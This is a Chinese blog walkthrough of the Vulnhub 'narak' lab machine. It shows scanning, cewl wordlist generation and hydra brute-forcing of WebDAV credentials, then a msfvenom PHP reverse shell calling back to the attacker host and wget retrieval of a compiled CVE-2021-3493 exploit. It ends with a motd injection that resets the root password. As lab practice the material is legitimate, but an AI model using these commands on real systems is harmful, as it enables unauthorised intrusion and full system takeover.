打靶narak

已于 2022-04-24 09:29:49 修改
阅读量1.6k 收藏 2
点赞数 1
分类专栏: 网络安全 笔记 文章标签: web安全 安全
于 2022-04-22 23:51:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42096378/article/details/124353688
版权

打靶narak

主机发现

nmap -sS 192.168.226.0/24

端口扫描

在这里插入图片描述

dirb基于字典的目录扫描工具

发现三个目录
在这里插入图片描述

在这里插入图片描述
访问该目录

网络存储文件共享之WebDAV

在这里插入图片描述
再用hydra爆破以下
或者burpsuite爆破
yamdoot, Swarg

.海德拉(Hydra)
Medusa(美杜莎)
patator
msf
都可以

用cewl工具通过爬取网站信息的关键字来生成字典,通过生成的字典进行爆破

在这里插入图片描述

用hydra爆破工具爆破

-L指定用户名 -P指定密码 ip地址加协议加路径。http就是网站的协议,get是采用的请求方法,后面加路径

在这里插入图片描述

再尝试登陆下:

在这里插入图片描述

无可用信息,查看下源代码:

cadaver工具连接

cadaver http://192.168.8.132/webdav

username:yamdoot

password:Swarg

1.百度发现webdav服务,需要cadaver工具连接,连接之后可以上传

在这里插入图片描述

上传shell

nmap -O 发现其实 linux 系统
在这里插入图片描述

用 msfvenom生成木马

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.226.142 lport=22345 -f raw -o /home/kali/Desktop/phpshell.php

在这里插入图片描述
监听
在这里插入图片描述
上传
在这里插入图片描述
liunx失败换一个php的

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.226.142 lport=22345 -f raw -o /home/kali/Desktop/phpshell.php

在这里插入图片描述
msf 监听
访问php文件
在这里插入图片描述
shell拿到
在这里插入图片描述

提权 权限维持

权限低
在这里插入图片描述

查看用户:

在这里插入图片描述
mnt 目录 hell.sh
在这里插入图片描述
https://www.splitbrain.org/services/ook

在这里插入图片描述
brainfuck to text解码,得到解密内容chitragupt 应该是密码
chitragupt

用ssh尝试登录其他用户,

输入刚刚解密的密码,发现成功登录该用户

ssh inferno@192.168.226.155

在这里插入图片描述
在这里插入图片描述

提权助手 提权 github 开源项目

https://github.com/mzet-/linux-exploit-suggester

linux中的.sh文件怎么执行?

1、直接./加上文件名.sh,如运行hello.sh为 ./hello.sh 【绝对路径下也可以,但hello.sh必须有x权限】

chmod u+x hello.sh
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
上传解压
在这里插入图片描述
在这里插入图片描述

挨个试一试

在这里插入图片描述

第一种 : 通过gcc编译提权文件,上传执行后,提权至root获取:

通过https://github.com/briskets/CVE-2021-3493 下载提权文件:
使用gcc将提权文件编译成可执行文件:

这种.c文件需要编译成可执行文件 记住

gcc exploit.c -o exploit

在这里插入图片描述

开放本机的8888端口 提供下载:
在这里插入图片描述
通过wget 传送至靶机上:

wget http://192.168.226.142:8888/exploit

在这里插入图片描述
在这里插入图片描述

第二种:使用motd提权,

在文件中最后一行写入命令,将root密码替换掉,切换root用户获取。

echo “echo ‘root:inferno’|sudo chpasswd” >> /etc/update-motd.d/00-header

退出后重新用inferno登录

su -root

成功获取root权限: 密码 inferno
在这里插入图片描述

嗯光
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
靶机渗透测试:narak
x_13579的博客
07-03 437
hydra爆破,cewl爬取
linux cadaver 命令,备份Linux操作系统的数据到坚果云的方法
weixin_35398720的博客
04-29 772
坚果云支持WebDAV,这样就能在Linux操作系统中使用命令行或者脚本的方式把数据备份到坚果云空间中,本文提供实现的方法。首先开启坚果云WebDAV服务“账户信息”--“安全选项”方式1、使用cadaver客户端1.安装cadaver[root@365linux ~]# yum install cadaver2.使用cadaver连接webdav服务器[root@365linux ~]# cad...
Kali工具库之cadaver
辰鬼的博客
05-17 5217
cadaver-Unix的命令行WebDAV客户端。 cadaver支持文件上载,下载,屏幕显示,名称空间操作(移动和复制),集合创建和删除以及锁定操作,其操作类似于标准BSD ftp(1)客户端和Samba项目的smbclient(1)。 熟悉这些工具的用户应该会对cadaver相当熟悉。 cadaver支持通过.netrc文件自动登录到需要身份验证的服务器(类似于ftp 请参见下面的“ .netrc文件”一节)。 原文: SYNOPSIS cadaver [-trp[-r file][
Kali从入门到出门-手记
阿木同学
11-05 4823
KALI手记 [L]为方法 [Q]是问题点 [A]为解决办法 [T]为工具 常用工具 [T] DNSenum DNS工具、DNS枚举 #dnsenum --enum baidu.com 附加选项: #--threads [num] 设置多线程 #-r 启用递归查询 #-d 设置WHOIS请求之间的延迟 #-w 启用WHOIS请求 #-o 输出到指定位置 [T]Nmap 看主机是否在线 #nmap -sP 192.168.1.1 扫描指定IP端口 #nmap 192.168.1.1 扫描指定IP 范围端口 #
最新kali之cadaver
vanony的博客
01-04 2645
描述:   cadaver-Unix的命令行WebDAV客户端。   cadaver支持文件上载,下载,屏幕显示,名称空间操作(移动和复制),集合创建和删除以及锁定操作,其操作类似于标准BSD ftp(1)客户端和Samba项目的smbclient(1)。 熟悉这些工具的用户应该会对cadaver相当熟悉。 cadaver支持通过.netrc文件自动登录到需要身份验证的服务器(类似于ftp(1)-请参见下面的“ .netrc文件”一节)。 选项: -t,--tolerant 允许cd / ope进入未启用
靶机练习 narak ,个人学习心得
最新发布
09-08
靶机练习 NARAK,个人学习心得 靶机练习 靶机练习是渗透测试的重要组成部分,它可以帮助我们检测系统中的安全漏洞和脆弱性。在这个练习中,我们使用的靶机是 NARAK,并且通过渗透测试来获取 Flag。 探测靶机 IP ...
Google搜索引擎算法的秘密
05-18
在IT行业中,搜索引擎优化(SEO)是至关重要的领域,尤其是对于Google搜索引擎,它的算法秘密一直是业界探讨的焦点。Google作为全球最广泛使用的搜索引擎,其强大的搜索能力得益于不断更新和优化的算法。...
Goruntu-Isleme
02-21
Bu komşuların sınıfları sayısının toplamı alınarak, en sık görülen sınıf o noktanın sınıflandırması olarak seçilir. **Jupyter Notebook Kullanımı** Jupyter Notebook, bilimsel ...
一些零碎知识,1
qq_43649282的博客
04-07 278
Handlebars.js 是一个 JavaScript 的页面模板库 WPScan是一款使用ruby编写、基于白盒测试的WordPress安全扫描器, Skipfish 是谷歌的一款安全扫描工具, OWASP Zed攻击代理(ZAP)是世界上最受欢迎的免费安全审计工具之一, Commix是一款功能强大的串口调试工具cadaverWEBDAV的 客户端,WebDAV协议允许用户通过HTTP保存和共享文件,这是一个非常有价值的突破,因为HTTP通常是只读的,除了访问文档外,用户可以编辑和重新上传它 们,你.
linux cadaver 命令,(个人学习Linux经历)文本命令
weixin_29533443的博客
04-29 436
[vbird@www ~]$command [-options] parameter1 parameter2...命令 选项 参数(1) 参数(2)说明:0. 一行命令中第一个输入的部分绝对是『命令(command)』或『可运行文件案』1. command 为命令的名称,例如变换路径的命令为 cd 等等;2. 中刮号[]并不存在于实际的命令中,而加入选项配置时,通常选项前会...
linux cadaver 命令,备份Linux系统的数据到坚果云
weixin_33179060的博客
04-29 519
坚果云支持webdav,则可以在Linux下使用命令行或脚本将数据备份到坚果云空间。开启坚果云WebDAV服务“账户信息”--“安全选项”方式1:使用cadaver客户端1. 安装cadaver[root@365linux ~]# yum install cadaver2. 使用cadaver连接webdav服务器[root@365linux ~]# cadaver https://dav.j...
linux cadaver 命令,【Linux学习第三篇】[Tab].[Ctrl]-c.[Ctrl]-d
weixin_29863809的博客
04-29 179
[root@localhost ~]# ls -al ~/.bash[Tab][Tab] //显示所有以.bash开头的文件名.bash_history .bash_logout .bash_profile .bashrc[root@localhost ~]# ca[Tab][Tab]//显示所有以ca 开...
vulnhub-nark靶机渗透
晴的博客
03-19 4961
1.主机发现 2.端口扫描: 3.访问80端口: 4.dirb基于字典的目录扫描工具 发现了三个目录 5.发现webdav服务,需要cadaver工具连接,连接之后可以上传。用cadaver在网站webdav对应目录下建立连接,类似ftp,之后上传webshell,通过浏览器访问木马地址连接到本地 6.用cewl工具通过爬取网站信息的关键字来生成字典,通过生成的字典进行爆破 7.生成字典内容如下(部分内容) 8.用hydra爆破工具爆破 -L指定用户名 -P指.
linux cadaver 命令,screen命令用法与cadaver
weixin_30591519的博客
04-29 797
screen命令用法一、简介作为linux服务器管理员,经常要使用ssh登陆到远程linux机器上做一些耗时的操作。也许你遇到过使用telnet或SSH远程登录linux,运行一些程序。如果这些程序需要运行很长时间(几个小时),而程序运行过程中出现网络故障,或者客户机故障,这时候客户机与远程服务器的链接将终端,并且远程服务器没有正常结束的命令将被迫终止。又比如你SSH到主机上后,开始批量的scp命...
linux cadaver 命令,对于linux中线程id的讨论
weixin_40003283的博客
04-29 73
LINUX系统中,POSIX threads库提供了pthread_t来标识一个线程,通过pthread_self()可以得到,如下:#include #include using namespace std;void* thread_func(void*){//pthread_t other_thread_id = pthread_self();//cout << "other_t...
几款Linux系统漏洞扫描、评估工具简介
热门推荐
晨曦蜗牛
02-02 2万+
一、Nmap Nmap 是一种常用工具,可用于判定网络的布局。我们可以在网络上使用 Nmap 来查找主机系统以及打开这些系统的端口。 1. 安装Nmap。 [root@GeekDevOps ~]# yum -y install nmap 使用示例(最简单的使用方法就是nmap 域名或ip): [root@GeekDevOps ~]# nmap 10.8.34.1 Start
Vulnhub靶机:HA_ NARAK
LainWith的博客
08-03 566
HA(此系列共17台)发布日期:2020年9月23日难度: 中目标: 取得 root 权限 + 2 Flag注释: 使用爆破,使用vmware虚拟机运行主机发现端口扫描信息收集密码字典定制爆破密码webdav漏洞PUT方法上传BF语言解码MOTD注入CVE-2021-3493提权。...
网络攻防之——常用网络扫描工具
The__Apollo的博客
03-18 1万+
netenum工具:一个很好用的IP段生成工具。可以用来查看有哪些主机在线(这个工具的第二个功能的查询结果不是特别准确,所以它的主要功能还是用来生成IP列表)。使用截图如下 fping工具:常用格式:fping -g 123.58.180.0/24,用来进行IP段扫描,使用示例如下图 nbtscan 工具:作用,扫描内网,使用示例如下图 ARPing工具:探测MAC地址(借助ARP协议) N
Web安全测试工具介绍
weixin_46236101的博客
10-14 1727
如今,Web 技术繁荣发展的同时,也带来了前所未有的安全挑战。有数据统计,所有黑客入侵事件中,85% 以上都是针对 Web 应用漏洞发起的攻击。 Web安全测试工具介绍 nikto 向目标发送探测数据包,并根据回包来判断其运行状况和处理方式的做法,称之为扫描。WEB扫描器的本质也不外如此。衡量WEB扫描器优劣的两个关键指标,是爬网能力和漏洞检测能力。nikto这款开源WEB扫描工具,在爬网能力上有独特的亮点,同时可以检测大部分常见漏洞类型,以及因配置管理不当造成的安全漏洞。更具有插件扩展、躲避检测等多种能力

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值